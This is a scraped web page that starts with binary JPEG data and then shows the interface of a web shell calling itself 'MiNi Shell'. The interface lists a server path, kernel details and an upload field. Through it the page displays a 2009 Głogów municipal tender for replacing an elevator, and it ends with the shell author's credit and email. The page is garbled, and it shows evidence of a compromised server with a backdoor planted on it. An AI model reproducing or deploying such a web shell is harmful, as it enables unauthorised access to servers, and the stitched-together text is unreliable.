JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090525/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090525/164788-N-2009.html

<p class="kh_header"><b>Głogów: Dostawa windy osobowej, 5-cio przystankowej wraz z oprzyrządowniem oraz jej instalacja w istniejącym szybie w budynku Urzędu Miejskiego w Głogowie wraz z demontażem i złomowaniem starej windy.</b><br>
<b>Numer ogłoszenia: 164788 - 2009; data zamieszczenia: 25.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Głogów , ul. Rynek 10, 67-200 Głogów, woj. dolnośląskie, tel. 076 7265437, 527, faks 076 7265437.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa windy osobowej, 5-cio przystankowej wraz z oprzyrządowniem oraz jej instalacja w istniejącym szybie w budynku Urzędu Miejskiego w Głogowie wraz z demontażem i złomowaniem starej windy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Dostarczenie i wymiana windy osobowej, 5-cio przystankowej wraz z oprzyrządowaniem oraz jej instalacja w istniejącym szybie w  budynku Urzędu Miejskiego w Głogowie.
2. Opracowanie niezbędnej dokumentacji uzgodnionej z Urzędem Dozoru Technicznego i wynikającej z przepisów prawa budowlanego.
3.Demontaż istniejącego dźwigu: typ hydrauliczny, wytwórca: C.M.M. CONSTRUZIONI MECCANICHE  MEZZAGO S.R.I;  VIA CURIEL; 42-20050 MEZZAGO (MI) ITALY,    rok budowy: 2001, udźwig: 800 kg lub10 osób, nr fabryczny: 010291, nr rejestr. 31.28.03922, urządzeń wraz ze złomowaniem.
4.Szczegółowy opis przedmiotu zamówienia zawiera załącznik Nr 7 do SIWZ.
5.Zamówienie należy wykonać zgodnie ze Specyfikacją Techniczną Wykonania i Odbioru Robót (zgodnie z załącznikiem Nr 8 do SIZW).
Zamawiający wymaga, aby przed złożeniem oferty Wykonawca przeprowadził w obecności przedstawiciela Zamawiającego wizję lokalną istniejącej windy, szybu i maszynowni w celu zapoznania się z jej stanem technicznym. Z przeprowadzonej wizji wymagane jest spisanie protokołu i podpisanie przez obie strony..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 42.41.61.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie 2.000 zł - słownie: dwa tysiące złotych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy zgodnie z art. 22 ustawy Prawo zamówień publicznych:

§	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
§	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia 
§	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
§	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 
 
II. Opis warunków udziału w postępowaniu oraz dokumentów potwierdzających spełnianie tych warunków :
1. Potwierdzenie warunku,  że wykonawca posiada uprawnienie do wykonywania  działalności objętej przedmiotem zamówienia Wykonawca zobowiązany jest udokumentować poprzez  :
§	złożenie aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia 
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy 
wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności 
gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu 
składania ofert.
2.Potwierdzenie warunku posiadania niezbędnej wiedzy  i doświadczenia  Wykonawca zobowiązany jest potwierdzić:
.	Sporządzonym i załączonym do oferty wykazem wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dostaw  odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, daty i miejsca wykonania  i odbiorców oraz dokumentami potwierdzającymi, że dostawy te zostały wykonane należycie.
      Zamawiający za dostawę podobną uzna dostarczenie i zamontowanie wraz z uruchomieniem   co najmniej jednej windy o wartości nie mniejszej niż 100.000 zł brutto.
.	Dokumenty potwierdzające, że osoby, które wykonywać będą zamówienie posiadają wymagane uprawnienia do montażu i modernizacji dźwigów osobowych wydane przez UDT,
.	Dokumenty potwierdzające, że osoby, które wykonywać będą zamówienie posiadają wymagane uprawnienia do montażu instalacji elektrycznych do 1 kV, w tym świadectwo kwalifikacyjne D i E ( w zależności od tego jakie roboty wykonują lub nadzorują ).

3. Potwierdzenie warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Wykonawca zobowiązany jest potwierdzić:
1.	Posiadanymi środkami finansowymi w wysokości co najmniej 100.000,00 zł lub 
       zdolnością kredytową w wysokości co najmniej 100.000,00 zł.
2.	Polisą, a w przypadku jej braku innym dokumentem potwierdzającym, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności obejmującej 
      przedmiot zamówienia na kwotę nie mniejszą niż 100 000 złotych.

Ocena spełniania przez Wykonawców wszystkich warunków określonych w niniejszej SIWZ będzie dokonana przez Zamawiającego na zasadzie: spełnia - nie spełnia, na podstawie żądanych dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Formularz ofertowy zał. Nr 1
2.	Protokół z wizji lokalnej podpisany przez obie strony.
3.	Oświadczenie o spełnianiu warunków udziału w postępowaniu na podst. art. 22 ust.1 ustawy Prawo zamówień publicznych. zał. Nr 2 
4.	Oświadczenie o spełnianiu warunków udziału w postępowaniu na podst. art. 24 ustawy Prawo zamówień publicznych. zał. Nr 3  
5.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej. 
6.	Wykaz wykonanych dostaw potwierdzający doświadczenie zawodowe Wykonawcy        zał. Nr 4 
7.	Wykaz  osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia oraz uprawnień niezbędnych do wykonania zamówienia, a także zakresu wykonanych przez nich czynności oraz załączeniem dokumentów potwierdzających ich uprawnienia (Świadectwo kwalifikacyjne). Zał. Nr 5
8.	Informacja o podwykonawcach Zał. Nr 6
9.	Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego, potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
10.	Aktualne zaświadczenie właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
11.	Polisa lub inny dokument ubezpieczenia OC
12.	Informacja z banku
13.	Dowód wniesienia wadium
14.	Opisy, foldery dotyczące oferowanej windy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.glogow.sbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Głogów
Rynek 10 
67-200 Głogów
Referat Zamówień Publicznych - pok. 314.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2009 godzina 10:00, miejsce: Urząd Miejski Głogów
Rynek 10 
67-200 Głogów
Sekretariat - pok. 125 - I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com